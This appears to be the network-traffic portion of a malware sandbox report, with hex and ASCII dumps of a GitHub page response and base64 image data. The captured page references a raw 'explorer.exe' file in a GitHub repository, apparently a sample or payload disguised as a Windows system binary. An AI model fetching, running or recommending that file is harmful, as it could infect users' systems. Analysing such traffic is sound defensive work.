                                                                                                                                  2022-10-17 20:07:12 UTC500INData Raw: 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39
                                                                                                                                  Data Ascii: repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9
                                                                                                                                  2022-10-17 20:07:12 UTC501INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e
                                                                                                                                  Data Ascii: > <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion
                                                                                                                                  2022-10-17 20:07:12 UTC502INData Raw: 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 67 6c 6f 62 61 6c 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72
                                                                                                                                  Data Ascii: <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr
                                                                                                                                  2022-10-17 20:07:12 UTC504INData Raw: 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72
                                                                                                                                  Data Ascii: 5.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Sear
                                                                                                                                  2022-10-17 20:07:12 UTC505INData Raw: 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69
                                                                                                                                  Data Ascii: 1 v-align-middle"></span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-ali
                                                                                                                                  2022-10-17 20:07:12 UTC506INData Raw: 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 61 75 74 68 2d 66 6f 72 6d 2d 62 6f 64 79 20 50 6f 70 6f 76 65 72 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 64 2d 6e 6f 6e 65 20 64 2d 73 6d 2d 6e 6f 6e 65 20 64 2d 6d 64 2d 6e 6f 6e 65 20 64 2d 6c 67 2d 62 6c 6f 63 6b 22 3e 0a 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 33 30 30 70 78 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 50 6f 70 6f 76 65 72 2d 6d 65 73 73 61 67 65 20 42 6f 78 20 50 6f 70 6f 76 65 72 2d 6d 65 73 73 61 67 65 2d 2d 74 6f 70 2d 72 69 67 68
                                                                                                                                  Data Ascii: olor: transparent; border: none" data-view-component="true" class="auth-form-body Popover position-absolute d-none d-sm-none d-md-none d-lg-block"> <div style="width: 300px" data-view-component="true" class="Popover-message Box Popover-message--top-righ
                                                                                                                                  2022-10-17 20:07:12 UTC508INData Raw: 61 61 2d 73 75 70 70 6f 72 74 22 20 6e 61 6d 65 3d 22 77 65 62 61 75 74 68 6e 2d 69 75 76 70 61 61 2d 73 75 70 70 6f 72 74 22 20 76 61 6c 75 65 3d 22 75 6e 6b 6e 6f 77 6e 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 6c
                                                                                                                                  Data Ascii: aa-support" name="webauthn-iuvpaa-support" value="unknown"><input type="hidden" name="return_to" id="return_to" value="https://github.com/testermanmag/myownre/raw/main/explorer.exe" autocomplete="off" class="form-control" /><input type="hidden" name="al
                                                                                                                                  2022-10-17 20:07:12 UTC508INData Raw: 32 32 45 43 0d 0a 69 64 22 20 69 64 3d 22 63 6c 69 65 6e 74 5f 69 64 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 69 64 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 30 36 65 37 22 20 68 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69
                                                                                                                                  Data Ascii: 22ECid" id="client_id" autocomplete="off" class="form-control" /><input type="hidden" name="integration" id="integration" autocomplete="off" class="form-control" /><input type="text" name="required_field_06e7" hidden="hidden" class="form-control" /><i
                                                                                                                                  2022-10-17 20:07:12 UTC509INData Raw: 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68
                                                                                                                                  Data Ascii: on_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/testermanmag/myownre/raw/main/explorer.exe&quot;,&quot;user_id&quot;:null}}" data-h
                                                                                                                                  2022-10-17 20:07:12 UTC511INData Raw: 31 2e 30 36 2d 31 2e 30 36 4c 36 2e 39 34 20 38 20 33 2e 37 32 20 34 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 7b 7b 20 6d 65 73 73 61 67 65 20 7d 7d 3c 2f 64 69 76 3e 0a 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 3c 2f 74 65 6d 70 6c 61 74 65 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 0a 20 20 3c 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 20 63 6c 61 73 73 3d 22 6a 73 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 73 68 65 6c 66 2d 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 22 20 64 61 74 61 2d 62 61 73 65 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63
                                                                                                                                  Data Ascii: 1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.c
                                                                                                                                  2022-10-17 20:07:12 UTC512INData Raw: 70 4c 43 4d 32 4f 44 6b 79 51 6c 4e 61 4b 79 55 36 4f 7a 4e 45 56 56 63 30 52 55 70 42 59 52 41 51 45 41 41 51 45 44 43 67 51 45 42 51 55 42 41 51 41 41 41 41 41 52 41 51 49 44 55 77 51 68 4d 5a 48 52 6b 71 4c 53 42 52 59 58 51 56 4c 69 42 71 46 43 51 77 66 68 67 68 52 6b 46 56 45 53 59 68 4d 7a 63 59 48 2f 32 67 41 4d 41 77 45 41 41 68 45 44 45 51 41 2f 41 50 6d 74 2b 4b 4c 36 66 48 79 4d 77 44 75 39 53 71 6c 55 46 74 42 52 41 7a 49 6c 4d 42 73 48 64 56 44 43 31 55 4f 42 32 34 51 70 67 4e 46 59 68 38 55 46 42 61 66 61 69 4a 54 41 43 70 50 5a 56 44 74 41 30 51 79 59 57 6c 45 70 68 62 4d 71 68 78 61 55 51 34 74 50 64 55 70 78 62 50 64 49 6c 4d 33 5a 57 4a 63 6e 46 73 30 51 4d 4c 46 53 6e 46 76 6b 67 59 57 30 56 69 43 4c 56 55 70 78 59 6f 55 77 73 43 71 47
                                                                                                                                  Data Ascii: pLCM2ODkyQlNaKyU6OzNEVVc0RUpBYRAQEAAQEDCgQEBQUBAQAAAAARAQIDUwQhMZHRkqLSBRYXQVLiBqFCQwfhghRkFVESYhMzcYH/2gAMAwEAAhEDEQA/APmt+KL6fHyMwDu9SqlUFtBRAzIlMBsHdVDC1UOB24QpgNFYh8UFBafaiJTACpPZVDtA0QyYWlEphbMqhxaUQ4tPdUpxbPdIlM3ZWJcnFs0QMLFSnFvkgYW0ViCLVUpxYoUwsCqG
                                                                                                                                  2022-10-17 20:07:12 UTC513INData Raw: 68 54 69 77 6f 55 52 59 64 6c 55 4d 4c 43 6e 4d 63 35 73 50 77 51 4e 39 4e 45 6f 34 42 43 6d 77 43 63 6f 49 74 47 79 41 69 33 68 41 32 4f 79 46 67 34 70 43 6a 67 69 5a 79 59 57 48 5a 49 55 63 46 51 63 45 51 63 41 69 77 52 61 45 53 4e 69 45 55 63 52 73 67 4c 63 4a 42 6d 56 69 5a 48 45 70 6a 42 6e 4c 59 6c 46 62 45 70 6a 42 6b 63 53 70 43 74 69 56 51 63 44 73 6f 44 39 4d 6f 4e 39 4d 71 6c 62 36 5a 33 55 6f 50 30 7a 75 6c 47 2b 6d 64 30 79 59 79 50 30 79 68 57 2b 6e 77 6f 56 73 4f 46 53 68 68 37 4d 6f 6f 34 46 45 44 46 49 56 73 55 69 74 69 6b 47 5a 53 47 4d 67 79 6f 7a 63 4b 41 59 38 49 4e 69 69 68 67 67 47 43 68 51 77 35 56 4b 33 30 77 6f 6f 66 54 47 36 49 33 30 2b 71 4c 51 77 34 55 41 78 62 52 30 41 4e 6f 32 54 6c 56 73 55 53 46 4e 69 4c 79 67 62 45 43 34
                                                                                                                                  Data Ascii: hTiwoURYdlUMLCnMc5sPwQN9NEo4BCmwCcoItGyAi3hA2OyFg4pCjgiZyYWHZIUcFQcEQcAiwRaESNiEUcRsgLcJBmViZHEpjBnLYlFbEpjBkcSpCtiVQcDsoD9MoN9Mqlb6Z3UoP0zulG+md0yYyP0yhW+nwoVsOFShh7Moo4FEDFIVsUitikGZSGMgyozcKAY8INiihggGChQw5VK30woofTG6I30+qLQw4UAxbR0ANo2TlVsUSFNiLygbEC4
                                                                                                                                  2022-10-17 20:07:12 UTC515INData Raw: 77 47 79 69 67 62 42 73 67 58 41 4b 49 47 43 4b 55 32 71 52 53 34 71 5a 58 42 63 45 6f 55 32 63 4a 56 4c 67 64 6b 4d 46 4e 68 32 51 4b 62 46 46 49 66 54 47 36 4b 58 42 51 78 6b 68 73 43 67 55 32 44 5a 46 70 44 36 59 55 55 68 74 47 6f 55 69 6b 4e 6a 6f 4a 6d 78 51 49 62 55 58 42 44 59 36 63 79 38 36 52 74 51 49 62 50 78 57 57 6f 51 32 39 31 44 43 5a 73 47 69 4e 63 68 44 62 78 33 55 45 7a 5a 33 51 49 62 44 73 6f 70 44 5a 39 36 69 6c 77 51 72 79 52 62 78 43 37 34 63 4b 71 4c 51 4a 31 51 50 6a 74 43 71 5a 55 46 70 5a 45 7a 6c 55 57 70 42 51 57 36 36 71 70 6b 34 74 34 56 67 63 57 6b 71 34 54 4b 6f 73 33 52 46 42 61 39 4b 4b 6f 63 57 61 6c 55 55 46 76 45 49 4b 43 7a 75 69 4b 43 33 68 49 68 78 61 72 45 4f 4c 43 71 48 46 71 75 4d 47 54 69 30 6c 45 4f 4c 43 71 48
                                                                                                                                  Data Ascii: wGyigbBsgXAKIGCKU2qRS4qZXBcEoU2cJVLgdkMFNh2QKbFFIfTG6KXBQxkhsCgU2DZFpD6YUUhtGoUikNjoJmxQIbUXBDY6cy86RtQIbPxWWoQ291DCZsGiNchDbx3UEzZ3QIbDsopDZ96ilwQryRbxC74cKqLQJ1QPjtCqZUFpZEzlUWpBQW66qpk4t4VgcWkq4TKos3RFBa9KKocWalUUFvEIKCzuiKC3hIhxarEOLCqHFquMGTi0lEOLCqH
                                                                                                                                  2022-10-17 20:07:12 UTC516INData Raw: 69 42 78 5a 77 6b 53 2f 41 77 74 56 69 48 46 71 59 77 6f 69 31 57 49 62 42 41 77 73 43 70 6e 42 73 52 73 6f 51 63 53 64 46 63 70 67 77 73 4b 5a 4d 5a 4e 39 4d 6f 47 2b 6e 79 67 4f 43 6c 44 59 4b 6f 4f 41 51 4e 67 4e 6b 79 63 6f 34 38 49 5a 77 4f 4b 45 48 45 6f 6f 34 37 4a 55 67 34 6f 6f 34 38 4f 71 67 34 63 4b 41 34 6f 44 6a 77 67 4f 4b 4a 79 74 69 72 53 44 69 6f 73 62 46 53 4c 52 78 43 71 51 63 52 73 68 6e 44 59 38 49 51 63 65 45 77 52 73 55 69 38 7a 59 6f 51 57 51 6a 59 38 49 6b 77 32 50 42 52 63 78 73 54 73 6f 73 48 48 68 42 73 54 73 6c 53 44 69 67 47 43 41 34 68 46 62 45 4b 44 59 68 45 6a 4e 77 67 7a 63 49 63 37 4e 77 69 73 33 43 41 4d 67 32 4b 44 59 68 51 44 48 73 69 77 4d 55 47 77 51 67 66 54 4f 79 41 59 48 5a 52 61 47 42 37 6f 4e 67 71 42 68 79 70
                                                                                                                                  Data Ascii: iBxZwkS/AwtViHFqYwoi1WIbBAwsCpnBsRsoQcSdFcpgwsKZMZN9MoG+nygOClDYKoOAQNgNkyco48IZwOKEHEoo47JUg4oo48Oqg4cKA4oDjwgOKJytirSDiosbFSLRxCqQcRshnDY8IQceEwRsUi8zYoQWQjY8Ikw2PBRcxsTsosHHhBsTslSDigGCA4hFbEKDYhEjNwgzcIc7Nwis3CAMg2KDYhQDHsiwMUGwQgfTOyAYHZRaGB7oNgqBhyp
                                                                                                                                  2022-10-17 20:07:12 UTC517INData Raw: 35 44 31 34 0d 0a 69 38 72 4d 69 4d 79 4b 32 49 56 52 6d 43 69 74 6a 31 51 48 48 68 42 73 46 49 74 62 36 5a 34 56 68 57 77 36 49 56 6a 36 61 46 62 42 49 55 4d 41 6f 72 59 42 56 47 77 34 43 41 59 6e 5a 52 57 59 68 45 5a 6c 4d 59 58 49 4d 68 47 59 4a 42 73 65 45 57 74 67 2b 6e 69 6f 42 39 50 68 44 47 51 50 70 2b 4f 69 4b 48 30 79 6f 74 4b 62 4e 79 67 47 43 44 59 68 51 67 59 44 5a 41 44 59 4e 6b 41 77 51 4b 62 4e 6c 47 69 59 6f 41 79 41 59 68 51 4c 68 77 71 46 77 4f 79 6a 52 54 5a 77 6f 70 54 59 64 55 51 75 43 4b 55 2b 6d 73 71 6d 66 54 56 6f 55 32 37 71 4b 51 32 42 51 71 5a 73 34 55 79 75 4d 6b 4e 71 69 6b 4e 76 43 47 4d 70 47 31 46 49 62 58 53 43 5a 73 4b 69 70 47 33 68 52 55 7a 61 70 46 54 4e 68 46 46 46 53 4e 6e 48 5a 51 54 75 73 65 56 4f 5a 65 64 49 32
                                                                                                                                  Data Ascii: 5D14i8rMiMyK2IVRmCitj1QHHhBsFItb6Z4VhWw6IVj6aFbBIUMAorYBVGw4CAYnZRWYhEZlMYXIMhGYJBseEWtg+nioB9PhDGQPp+OiKH0yotKbNygGCDYhQgYDZADYNkAwQKbNlGiYoAyAYhQLhwqFwOyjRTZwopTYdUQuCKU+msqmfTVoU27qKQ2BQqZs4UyuMkNqikNvCGMpG1FIbXSCZsKipG3hRUzapFTNhFFFSNnHZQTuseVOZedI2
                                                                                                                                  2022-10-17 20:07:12 UTC518INData Raw: 6f 67 74 62 62 77 74 4d 71 43 31 55 56 46 71 49 71 4c 55 52 51 57 71 6d 56 42 5a 77 69 52 53 32 77 37 4b 6f 71 4c 47 30 52 44 69 77 6c 55 71 6c 76 70 71 6c 55 46 69 4a 61 59 57 6f 68 78 59 6f 70 78 59 46 55 4e 69 4e 67 69 47 41 56 68 54 43 30 37 49 55 34 73 51 4d 4c 65 45 51 32 50 43 41 73 69 77 63 56 55 68 73 56 51 77 73 34 68 51 48 44 68 58 6d 54 6e 4e 67 66 38 41 43 67 59 57 48 67 49 44 67 64 30 51 63 45 55 63 41 6b 42 46 6f 30 64 57 41 34 63 49 47 46 6e 43 41 69 31 45 6a 43 33 65 55 55 63 52 43 45 48 48 68 41 57 51 62 45 37 4b 56 52 78 4f 79 72 49 34 6c 53 71 32 4b 55 48 46 4b 4e 68 34 70 53 6a 69 4e 6c 4b 44 69 4e 6b 6f 32 41 32 54 42 6b 63 65 41 67 4f 4a 36 49 4e 69 6f 4e 69 71 4e 6a 79 67 32 4b 41 34 6c 4d 6d 47 78 4b 6c 56 73 53 6c 42 78 50 41 52
                                                                                                                                  Data Ascii: ogtbbwtMqC1UVFqIqLURQWqmVBZwiRS2w7KoqLG0RDiwlUqlvpqlUFiJaYWohxYopxYFUNiNgiGAVhTC07IU4sQMLeEQ2PCAsiwcVUhsVQws4hQHDhXmTnNgf8ACgYWHgIDgd0QcEUcAkBFo0dWA4cIGFnCAi1EjC3eUUcRCEHHhAWQbE7KVRxOyrI4lSq2KUHFKNh4pSjiNlKDiNko2A2TBkceAgOJ6INioNiqNjyg2KA4lMmGxKlVsSlBxPAR
                                                                                                                                  2022-10-17 20:07:12 UTC520INData Raw: 73 53 47 52 57 5a 45 5a 6c 4d 72 68 6d 50 52 41 63 59 4b 71 4e 69 4e 67 67 47 41 52 57 77 64 51 6f 34 62 4b 31 41 4e 68 32 55 56 6d 62 52 57 70 47 5a 52 57 59 4b 51 42 6b 47 49 44 6f 59 77 32 49 56 41 78 35 55 55 47 4b 71 4d 33 43 45 42 6b 55 4d 65 36 55 41 32 2b 43 69 34 4c 6a 79 68 41 78 4f 33 64 41 47 4b 69 74 69 69 42 68 39 7a 71 4c 6e 4a 54 62 32 53 68 54 59 69 2f 37 69 34 71 4c 51 78 43 49 58 41 4b 4b 51 32 4b 42 54 59 69 6b 4e 71 45 4b 62 56 42 4d 32 70 56 69 5a 74 52 63 45 4e 71 67 6d 62 4e 6b 61 77 6b 62 57 55 69 31 4d 32 71 43 4e 31 71 4b 6b 62 56 46 52 75 74 55 68 55 72 72 56 46 52 75 74 52 55 62 72 56 46 71 57 4d 71 4e 50 49 74 74 6f 75 7a 67 75 4c 52 73 72 68 46 37 62 64 57 57 73 59 5a 79 73 4c 65 45 46 72 62 59 52 4d 72 57 32 71 34 52 61 32
                                                                                                                                  Data Ascii: sSGRWZEZlMrhmPRAcYKqNiNggGARWwdQo4bK1ANh2UVmbRWpGZRWYKQBkGIDoYw2IVAx5UUGKqM3CEBkUMe6UA2+Ci4LjyhAxO3dAGKitiiBh9zqLnJTb2ShTYi/7i4qLQxCIXAKKQ2KBTYikNqEKbVBM2pViZtRcENqgmbNkawkbWUi1M2qCN1qKkbVFRutUhUrrVFRutRUbrVFqWMqNPIttouzguLRsrhF7bdWWsYZysLeEFrbYRMrW2q4Ra2
                                                                                                                                  2022-10-17 20:07:12 UTC521INData Raw: 55 42 59 4f 67 49 74 4b 71 51 32 49 31 4b 45 45 41 62 64 46 46 6a 49 47 62 68 56 42 46 70 51 79 32 4b 4b 4c 49 6b 46 6b 42 77 4f 79 41 34 46 41 63 41 68 7a 43 4c 52 73 68 7a 44 6a 39 36 69 69 79 71 4d 79 55 46 75 45 47 5a 42 6d 52 59 4c 56 53 49 7a 64 30 47 59 4b 6a 4d 6b 47 38 74 6c 46 62 68 41 56 52 70 51 5a 43 4d 79 44 4d 70 67 79 7a 62 53 68 42 5a 4b 52 6d 38 45 56 6d 61 71 56 4f 64 6d 38 45 47 62 56 54 6d 57 30 57 47 71 74 52 6d 2f 42 52 57 62 68 4b 43 78 32 56 52 6d 55 49 33 64 46 5a 43 43 68 47 52 49 7a 49 72 4d 70 42 75 69 6f 33 56 51 5a 41 4b 61 4b 4b 79 6f 4b 49 45 61 71 4b 7a 42 56 41 4e 76 4c 4b 4b 42 42 51 42 6a 39 71 71 4d 67 43 69 35 5a 6b 4b 44 56 51 42 55 5a 52 51 5a 39 45 41 62 5a 43 41 31 58 51 42 49 41 79 6b 47 49 48 5a 41 47 31 43 74
                                                                                                                                  Data Ascii: UBYOgItKqQ2I1KEEAbdFFjIGbhVBFpQy2KKLIkFkBwOyA4FAcAhzCLRshzDj96iiyqMyUFuEGZBmRYLVSIzd0GYKjMkG8tlFbhAVRpQZCMyDMpgyzbShBZKRm8EVmaqVOdm8EGbVTmW0WGqtRm/BRWbhKCx2VRmUI3dFZCChGRIzIrMpBuio3VQZAKaKKyoKIEaqKzBVANvLKKBBQBj9qqMgCi5ZkKDVQBUZRQZ9EAbZCA1XQBIAykGIHZAG1Ct
